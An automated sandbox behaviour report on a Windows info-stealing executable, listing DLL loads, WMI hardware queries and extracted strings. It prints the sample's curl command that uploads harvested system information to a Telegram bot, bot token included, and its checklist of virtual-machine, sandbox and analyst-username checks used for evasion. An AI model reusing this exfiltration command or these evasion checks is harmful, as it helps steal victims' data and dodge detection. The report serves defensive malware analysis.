Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Process created: C:\Windows\System32\curl.exe "curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=284330-4180-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\9KEZfGRjyK.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exeSection loaded: schannel.dll
Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\systeminfo.exe "systeminfo"
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m sbiedll.dll
Source: 9KEZfGRjyK.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 9KEZfGRjyK.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: data.pdb source: 9KEZfGRjyK.exe
Source: Binary string: data.pdb)444 source: 9KEZfGRjyK.exe
Source: 9KEZfGRjyK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 9KEZfGRjyK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 9KEZfGRjyK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 9KEZfGRjyK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 9KEZfGRjyK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F412AA60 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,ReleaseMutex,0_2_00007FF7F412AA60
Source: 9KEZfGRjyK.exeStatic PE information: section name: .padding
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq 0_2_00007FF7F4102720
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel 0_2_00007FF7F4108B20
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel 0_2_00007FF7F41142E0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel 0_2_00007FF7F41284D0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel 0_2_00007FF7F4101000
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model, Size FROM Win32_DiskDrive
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: tasklist.exe, 00000016.00000002.1756477526.000001CD45DC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: API_LOG.DLL:\US
Source: tasklist.exe, 00000012.00000002.1743875843.00000294AA700000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL:\US
Source: tasklist.exe, 00000016.00000003.1755468629.000001CD45BFC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000002.1756308730.000001CD45BFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: API_LOG.DLL
Source: 9KEZfGRjyK.exeBinary or memory string: DIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMCOMPUTERSYSTEMGETMODEL
Source: tasklist.exe, 00000012.00000002.1743616105.00000294AA550000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\DESKTOP\C:\WINDOWS\SYSTEM32\TASKLIST.EXE"TASKLIST" /M SBIEDLL.DLLC:\WINDOWS\SYSTEM32\TASKLIST.EXEWINSTA0\DEFAULT
Source: tasklist.exe, 00000012.00000002.1743616105.00000294AA550000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "TASKLIST" /M SBIEDLL.DLL
Source: tasklist.exe, 00000018.00000002.1760804705.0000022FD3AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "TASKLIST" /M DIR_WATCH.DLL
Source: 9KEZfGRjyK.exeBinary or memory string: DBGHELP.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMCOM
Source: 9KEZfGRjyK.exeBinary or memory string: SBIEDLL.DLLDBGHELP.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARA
Source: tasklist.exe, 00000012.00000002.1743730357.00000294AA58C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1743068542.00000294AA58C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MSBIEDLL.DLL
Source: tasklist.exe, 00000018.00000003.1760070471.0000022FD3B19000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000002.1760957579.0000022FD3B1B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000003.1759944569.0000022FD3B07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MDIR_WATCH.DLL
Source: tasklist.exe, 00000016.00000003.1755468629.000001CD45BFC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000002.1756308730.000001CD45BFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MAPI_LOG.DLL
Source: 9KEZfGRjyK.exeBinary or memory string: API_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMCOMPUTERSYSTEM
Source: 9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422724790.0000026594338000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: - DIR_WATCH.DLL
Source: tasklist.exe, 00000016.00000002.1756477526.000001CD45DC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MAPI_LOG.DLLOWSTEMP
Source: tasklist.exe, 00000018.00000003.1760070471.0000022FD3B19000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000002.1760957579.0000022FD3B1B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000002.1761093661.0000022FD3DF0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000003.1759944569.0000022FD3B07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DIR_WATCH.DLL
Source: tasklist.exe, 00000016.00000002.1756212113.000001CD45BB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\DESKTOP\C:\WINDOWS\SYSTEM32\TASKLIST.EXE"TASKLIST" /M API_LOG.DLLC:\WINDOWS\SYSTEM32\TASKLIST.EXEWINSTA0\DEFAULT
Source: tasklist.exe, 00000012.00000002.1743730357.00000294AA58C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1743068542.00000294AA58C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
Source: tasklist.exe, 00000016.00000002.1756212113.000001CD45BB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "TASKLIST" /M API_LOG.DLL
Source: 9KEZfGRjyK.exeBinary or memory string: SBIEDLL.DLLDBGHELP.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMCOMPUTERSYSTEMGETMODEL
Source: tasklist.exe, 00000018.00000002.1761093661.0000022FD3DF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MDIR_WATCH.DLLTEMP
Source: tasklist.exe, 00000018.00000002.1760804705.0000022FD3AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\DESKTOP\C:\WINDOWS\SYSTEM32\TASKLIST.EXE"TASKLIST" /M DIR_WATCH.DLLC:\WINDOWS\SYSTEM32\TASKLIST.EXEWINSTA0\DEFAULTJW
Source: 9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422724790.0000026594338000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: - API_LOG.DLL
Source: tasklist.exe, 00000012.00000002.1743875843.00000294AA700000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MSBIEDLL.DLLOWSTEMPK
Source: tasklist.exe, 00000018.00000002.1760804705.0000022FD3AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "TASKLIST" /M DIR_WATCH.DLL.W
Source: 9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422724790.0000026594338000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: - SBIEDLL.DLL
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeFile opened / queried: C:\windows\sysnative\drivers\vmhgfs.sys
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeFile opened / queried: C:\windows\sysnative\drivers\vmmouse.sys
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT IdentifyingNumber FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7F411EB20 CloseHandle,FindFirstFileW,FindClose,0_2_00007FF7F411EB20
Source: getmac.exe, 0000000D.00000003.1734488419.000001DBD421F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1734307321.000001DBD420C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1734866092.000001DBD4221000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
Source: system_info.txt.0.drBinary or memory string: - vboxservice.exe
Source: tasklist.exe, 00000026.00000002.1789577137.000001D7126C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tasklist" /fi "IMAGENAME eq vboxtray.exe"wk^D
Source: 9KEZfGRjyK.exeBinary or memory string: VBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: 9KEZfGRjyK.exeBinary or memory string: Paul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: getmac.exe, 0000000D.00000003.1734488419.000001DBD421F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1734307321.000001DBD420C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1734866092.000001DBD4236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
Source: tasklist.exe, 00000024.00000002.1787805517.000002173DA8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE');
Source: 9KEZfGRjyK.exeBinary or memory string: C:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: 9KEZfGRjyK.exe, 00000000.00000002.2423573230.000002AC2CAFC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2422724790.0000026594338000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: - vboxtray.exe
Source: getmac.exe, 0000000D.00000003.1734488419.000001DBD421F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000003.1734307321.000001DBD420C000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000000D.00000002.1734866092.000001DBD4221000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: 9KEZfGRjyK.exeBinary or memory string: malwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: C:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: 9KEZfGRjyK.exeBinary or memory string: testadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000026.00000002.1789577137.000001D7126C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'
Source: tasklist.exe, 00000026.00000002.1789577137.000001D7126C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\tasklist.exe"tasklist" /fi "IMAGENAME eq vboxtray.exe"C:\Windows\system32\tasklist.exeWinsta0\Default3k^
Source: 9KEZfGRjyK.exeBinary or memory string: workvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000022.00000002.1785611901.000001F9D2F90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\tasklist.exe"tasklist" /fi "IMAGENAME eq vmtoolsd.exe"C:\Windows\system32\tasklist.exeWinsta0\DefaultA
Source: 9KEZfGRjyK.exeBinary or memory string: dekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000024.00000002.1787805517.000002173DA8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vboxservice.exe
Source: tasklist.exe, 00000022.00000003.1785291291.000001F9D2FB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: , ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'0
Source: 9KEZfGRjyK.exeBinary or memory string: analysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: XENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: vmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: 9KEZfGRjyK.exeBinary or memory string: pstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: usertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: dbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcom
Source: 9KEZfGRjyK.exeBinary or memory string: dir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: defaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: adminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000026.00000003.1789165083.000001D7126FA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000002.1789681464.000001D7126FC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000003.1789092020.000001D7126E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IMAGENAME eq vboxtray.exe
Source: 9KEZfGRjyK.exeBinary or memory string: LisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000022.00000003.1785347832.000001F9D2FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'A
Source: 9KEZfGRjyK.exeBinary or memory string: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
